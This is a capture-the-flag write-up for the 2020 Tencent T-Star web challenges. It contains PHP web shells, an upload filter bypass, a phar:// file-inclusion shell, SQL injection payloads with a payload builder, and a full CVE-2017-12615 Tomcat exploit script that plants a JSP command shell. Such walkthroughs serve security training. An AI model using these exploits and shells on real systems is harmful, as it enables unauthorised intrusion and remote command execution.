2020 Tencent Rhino-Bird Network Security T-Star University Challenge

2020 Tencent Rhino-Bird Network Security T-Star University Challenge write-up

1. Sign-in challenge

The upload restriction is enforced only by client-side JavaScript, so disable JavaScript in Google Chrome's settings and upload a one-line PHP web shell directly.


Then connect to the shell with a web-shell client.


2. Basic command execution

The command execution has no protection at all: appending a pipe character followed by our own command bypasses it directly.


flag{usderhky}

3. Can you brute-force it?

Logging in as admin with password admin succeeds. The cookie holds the username base64-encoded, so every test string has to be base64-encoded before it goes into the cookie.

A single quote in the cookie value triggers an error whose message shows the value is enclosed in double quotes, so the injection closes with a double quote. Probing the column count, 3 columns produces no error.

1" union select 1,2,database()#

MSIgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==


Dump the table names:

1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'#

MSIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIw==

Dump the columns of the table:

1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'#

MSIgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0nZmxhZycj

Dump the data:

1" union select 1,2,flag from security.flag#

MSIgdW5pb24gc2VsZWN0IDEsMixmbGFnIGZyb20gc2VjdXJpdHkuZmxhZyM=


4. File upload

The extension `pht` is not filtered and the server parses it as PHP, so upload a `.pht` file.

The upload also strips `<?php` and `eval` from the file content. The bypass is to splice each blacklisted token in two and put a full copy of the token in the middle, so that one non-recursive removal pass reassembles the original:

```
<<??p<?phphp evevalal($_POST[1]);?>
```

For `evevalal`, removing `eval` once leaves `eval`. The `<<??p<?phphp` prefix implies the filter also removes a bare `<?` after it removes `<?php`: removing `<?php` leaves `<<??php`, and removing `<?` then leaves `<?php`. Pad the file with filler characters until it reaches about 20K, and the upload goes through.

```http
POST /upload.php HTTP/1.1
Host: 7417116e.yunyansec.com
Content-Length: 53918
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://7417116e.yunyansec.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCFQQXXNG9HbLSTFx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://7417116e.yunyansec.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundaryCFQQXXNG9HbLSTFx
Content-Disposition: form-data; name="file"; filename="2.pht"
Content-Type: image/gif

GIF89a
<<??p<?phphp evevalal($_POST[1]);?>(followed by N filler characters, enough to reach 20K)
------WebKitFormBoundaryCFQQXXNG9HbLSTFx
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryCFQQXXNG9HbLSTFx--
```

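To see why the doubled payload survives, here is an added example (my own code, not from the challenge or the write-up) that simulates the filter as a single-pass `str_replace` over an assumed blacklist of `<?php`, `<?` and `eval` in that order, which is what the working payload implies. It traces each removal, contrasts it with a filter that re-scans until nothing changes, and builds the padded GIF-prefixed body. The blacklist contents and the 20K threshold are assumptions taken from the write-up's observations.

```python
# Added example, not the challenge's code: simulates the upload filter as a
# single-pass blacklist strip and shows how the doubled payload survives it.
TOKENS = ["<?php", "<?", "eval"]   # assumed blacklist and order, inferred from the payload
MIN_SIZE = 20 * 1024               # the write-up found the file had to reach about 20K
PAYLOAD = "<<??p<?phphp evevalal($_POST[1]);?>"   # the payload from the write-up


def strip_trace(data, tokens=TOKENS):
    """Remove each token everywhere, once, in order (PHP str_replace with an
    array argument does exactly this); return the string after every step."""
    states = [data]
    for token in tokens:
        data = data.replace(token, "")
        states.append(data)
    return states


def strip_once(data, tokens=TOKENS):
    """The simulated filter: the last state of a single pass."""
    return strip_trace(data, tokens)[-1]


def strip_until_stable(data, tokens=TOKENS):
    """What a hardened filter does: re-scan until nothing changes.
    The doubled payload does not survive this."""
    prev = None
    while data != prev:
        prev, data = data, strip_once(data, tokens)
    return data


def build_body(payload=PAYLOAD, min_size=MIN_SIZE):
    """GIF89a header as in the write-up's request, the payload, then filler
    after ?> so PHP simply echoes the padding and executes nothing else."""
    head = b"GIF89a\n" + payload.encode()
    return head + b"A" * max(0, min_size - len(head))


if __name__ == "__main__":
    for step, text in zip(["input"] + TOKENS, strip_trace(PAYLOAD)):
        print("%-6s %s" % (step, text))
    print("recursive:", strip_until_stable(PAYLOAD))
    print("body size:", len(build_body()))
```

The recursive variant is the check worth remembering when you are on the defending side: a blacklist that removes tokens in one pass is bypassed by any split-and-double construction, while a whitelist on content type plus storing uploads outside the web root removes the problem entirely.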

5. File inclusion to get a shell

The LFI source is shown in index.php: a `.php` suffix is appended to the parameter before it is included.

```php
<?php
$file = $_REQUEST['file'];
if ($file != '') {
    $inc = sprintf("%s.php", $file); // only php file can be included
    include($inc);
}
?>
```

Following the hint, use the phar:// stream wrapper. The challenge only accepts .txt uploads, but the wrapper does not care about the outer file's extension and can read zip archives, so zip the PHP file, rename the archive to .txt and upload it. The appended `.php` is satisfied by naming the entry inside the archive `phpinfo.php` and referencing it without the extension:

http://56781788.yunyansec.com/lfi.php?file=phar://files/xnbuCDBlNRJ8OKJ2.txt/phpinfo

phpinfo() renders, which confirms the include works. Repeat with an archive containing a web shell named POST.php, uploaded as POST.txt, to get a shell:

http://cbd770a4.yunyansec.com/lfi.php?file=phar://files/C1pYLZLNXgZedimk.txt/POST
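As an added example (not the challenge's or the author's code), the following builds the archive and the include path: a zip whose single entry is `<entry>.php`, written under a `.txt` name so the upload whitelist accepts it, and the `phar://` value for `?file=`. The upload path `files/C1pYLZLNXgZedimk.txt` is the one from the write-up; the web-shell contents and the `.txt` enforcement in `write_upload` are my own.

```python
# Added example, not from the write-up: builds the zip-as-.txt archive and
# the phar:// include path for the LFI above.
import io
import zipfile


def make_archive(entry, php_code):
    """Return zip bytes holding <entry>.php. The application appends '.php'
    to the parameter, so the phar path ends in the bare entry name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(entry + ".php", php_code)
    return buf.getvalue()


def archive_entries(data):
    """Names inside an archive, used to check what the include will see."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def include_param(uploaded_path, entry):
    """Value for ?file= : phar://<uploaded archive>/<entry>; the app adds .php."""
    return "phar://%s/%s" % (uploaded_path, entry)


def write_upload(path, entry, php_code):
    """Write the archive under a .txt name so the upload whitelist accepts it."""
    if not path.endswith(".txt"):
        raise ValueError("the challenge only accepts .txt uploads")
    with open(path, "wb") as f:
        f.write(make_archive(entry, php_code))
    return path


if __name__ == "__main__":
    shell = "<?php eval($_POST[1]); ?>"          # placeholder web shell
    print(write_upload("POST.txt", "POST", shell))
    print(include_param("files/C1pYLZLNXgZedimk.txt", "POST"))
```

The archive is written uncompressed (`ZIP_STORED`); the phar wrapper reads deflated entries too, but stored entries keep the upload trivially inspectable while you are debugging why an include fails.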

6. Report card

Adding a single quote causes an error, so this looks like a string-context injection.

1' order by 5#

`order by 5` fails, so the query has 4 columns.

-1' union select 1,2,3,4#

All four positions are reflected on the page; the fourth is used below.

Dump the table names:

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='web1'#

Dump the columns of the table:

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

Dump the data:

-1' union select 1,2,3,flag from web1.fl4g#

flag{Sql_INJECT0N_4813drd8hz4}
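The following added example (my own code, not from the write-up) generalises the payloads from challenges 3 and 6: a builder that places the extraction expression in a chosen column for either quote context, the three enumeration steps against `information_schema`, and for challenge 3 the base64 wrapping the cookie needs. `send_with_cookie` and its `cookie_name` argument are assumptions; the write-up does not name the cookie.

```python
# Added example (not from the write-up): union-based payloads for
# challenges 3 and 6, plus the base64 cookie wrapping challenge 3 needs.
import base64
import http.client
from urllib.parse import urlsplit


def union_payload(select_expr, columns, position, quote, prefix="1"):
    """Build '<prefix><quote> union select ...#' with select_expr placed in
    the 1-based column `position`; other columns are literal placeholders."""
    cols = [str(i) for i in range(1, columns + 1)]
    cols[position - 1] = select_expr
    return "%s%s union select %s#" % (prefix, quote, ",".join(cols))


def enum_payloads(db, table, flag_col, columns, position, quote, prefix="1"):
    """The three enumeration steps: table names, column names, then the data."""
    steps = {
        "tables": "group_concat(table_name) from information_schema.tables "
                  "where table_schema='%s'" % db,
        "columns": "group_concat(column_name) from information_schema.columns "
                   "where table_name='%s'" % table,
        "data": "%s from %s.%s" % (flag_col, db, table),
    }
    return {name: union_payload(expr, columns, position, quote, prefix)
            for name, expr in steps.items()}


def cookie_value(payload):
    """Challenge 3 keeps the username base64-encoded in the cookie, so the
    injection string is base64-encoded the same way."""
    return base64.b64encode(payload.encode()).decode()


def send_with_cookie(url, cookie_name, payload):
    """Issue one request with the injected cookie (network; not used by the
    offline checks). cookie_name is an assumption: the write-up does not
    give the cookie's name."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.netloc)
    conn.request("GET", parts.path or "/",
                 headers={"Cookie": "%s=%s" % (cookie_name, cookie_value(payload))})
    resp = conn.getresponse()
    return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    # challenge 3: double-quote context, 3 columns, output read from column 3
    for name, p in enum_payloads("security", "flag", "flag", 3, 3, '"').items():
        print(name, p, cookie_value(p))
    # challenge 6: single-quote context, 4 columns, column 4, prefix -1
    for name, p in enum_payloads("web1", "fl4g", "flag", 4, 4, "'", "-1").items():
        print(name, p)
```

The `-1` prefix in challenge 6 makes the original row match nothing so only the union row is displayed; in challenge 3 the original row is harmless because the page reflects the third column regardless.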

7. Kitty steps on a lightbulb

CVE-2017-12615 (Tomcat arbitrary file upload through HTTP PUT). I used a Python script someone posted online, which is much faster than doing it by hand (shown here in Python 3 form):

```python
# -*- coding: utf-8 -*-
# CVE-2017-12615: with readonly=false on Tomcat's DefaultServlet, an HTTP PUT
# writes arbitrary files. The JSP is PUT as "<name>.jsp/" so the request is not
# handled by the JSP servlet; Tomcat drops the trailing slash when saving.
# Usage: python3 put_shell.py host[:port]
import http.client
import sys
import time

# JSP shell: GET <shell>?pwd=023&cmd=<command>
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''

try:
    conn = http.client.HTTPConnection(sys.argv[1])
    # OPTIONS probe: the Allow header lists PUT when the server accepts it
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = {k.lower(): v for k, v in conn.getresponse().getheaders()}
    if 'allow' in headers and 'PUT' in headers['allow']:
        conn.close()
        conn = http.client.HTTPConnection(sys.argv[1])
        url = "/" + str(int(time.time())) + '.jsp/'
        #url = "/" + str(int(time.time())) + '.jsp::$DATA'   # NTFS variant for Windows targets
        conn.request(method='PUT', url=url, body=body)
        res = conn.getresponse()
        if res.status == 201:
            #print('shell:', 'http://' + sys.argv[1] + url[:-7])  # strip ::$DATA for the Windows variant
            print('shell:', 'http://' + sys.argv[1] + url[:-1])
        elif res.status == 204:
            print('file exists')   # 204 means an existing resource was overwritten
        else:
            print('error')
        conn.close()
    else:
        print('Server not vulnerable')
except Exception as e:
    print('Error:', e)
```

Running the script prints the shell URL. Then run commands through it:

?&pwd=023&cmd=cat flag.txt

You can also do this by hand: capture the request in Burp and change the method to PUT.

9. Command execution

```php
<?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<7){
    echo shell_exec($_GET[1]);
}

?>
```

This is a command-execution bypass under a length limit: the command must be shorter than 7 characters, and the key is in the parent directory.

Getting a full shell within that limit was too much hassle, and after several failed attempts I switched approaches and simply cat the key file. Two requests do it:

http://dbb1b265.yunyansec.com/?1=>cat

http://dbb1b265.yunyansec.com/?1=*%20../*

The first command, `>cat`, is a redirection with no command, so sh just creates an empty file named `cat` in the web root. The second, `* ../*`, is globbed by the shell before the command is looked up: `*` expands to `cat index.php` (provided nothing else in the directory sorts before `cat`) and `../*` to the entries of the parent directory, so what actually runs is `cat index.php` followed by every file one level up, and the key comes back in the response.
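Added example, not from the write-up: it replays the two requests in a throwaway directory tree, running each string through `/bin/sh -c` the way `shell_exec` does, so you can watch the globbing do the work. The directory layout (`html/index.php` next to a `key` file) and the key contents are constructed for the demonstration.

```python
# Added example, not from the write-up: replays the two sub-7-character
# commands in a throwaway directory tree through /bin/sh, as shell_exec does.
import os
import subprocess
import tempfile

LIMIT = 7   # the challenge requires strlen($_GET[1]) < 7


def shell_exec(cmd, cwd):
    """Run cmd via /bin/sh -c from cwd and return stdout, like PHP's shell_exec."""
    if len(cmd) >= LIMIT:
        raise ValueError("%r is %d chars, limit is %d" % (cmd, len(cmd), LIMIT))
    done = subprocess.run(cmd, shell=True, cwd=cwd, capture_output=True, text=True)
    return done.stdout


def demo():
    """Constructed layout: <root>/html/index.php is the web root and <root>/key
    is the target one level up. Returns the output of the second request."""
    with tempfile.TemporaryDirectory() as root:
        web = os.path.join(root, "html")
        os.mkdir(web)
        with open(os.path.join(web, "index.php"), "w") as f:
            f.write("<?php /* challenge page */ ?>\n")
        with open(os.path.join(root, "key"), "w") as f:
            f.write("flag{constructed_example}\n")   # sample value, not the real key
        # request 1: a bare redirection with no command creates an empty file "cat"
        shell_exec(">cat", web)
        # request 2: sh globs before it looks the command up, so "*" becomes
        # "cat index.php" and "../*" becomes "../html ../key"; the directory
        # argument only produces a complaint on stderr, the key goes to stdout
        return shell_exec("* ../*", web)


if __name__ == "__main__":
    print(demo())
```

The trick depends on glob ordering: if the web root held a file sorting before `cat` (anything starting with `a` or `b`, say), `*` would put that name in command position and the second request would fail, which is why the first thing to check on a real target is a directory listing.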